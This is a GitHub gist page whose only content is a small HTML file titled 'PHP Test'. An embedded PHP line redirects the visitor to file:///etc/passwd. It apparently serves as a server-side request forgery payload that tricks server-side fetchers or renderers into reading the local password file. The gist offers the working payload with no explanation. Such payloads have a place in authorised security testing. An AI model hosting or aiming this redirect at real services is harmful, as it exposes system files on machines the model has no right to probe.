Skip to content

Instantly share code, notes, and snippets.

@vandycknick
Created July 3, 2024 15:06
Show Gist options
  • Save vandycknick/f5e28b37aaa83528626c7b3573146127 to your computer and use it in GitHub Desktop.
Save vandycknick/f5e28b37aaa83528626c7b3573146127 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<title>PHP Test</title>
</head>
<body>
<?php header('location:file:///etc/passwd'); ?>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment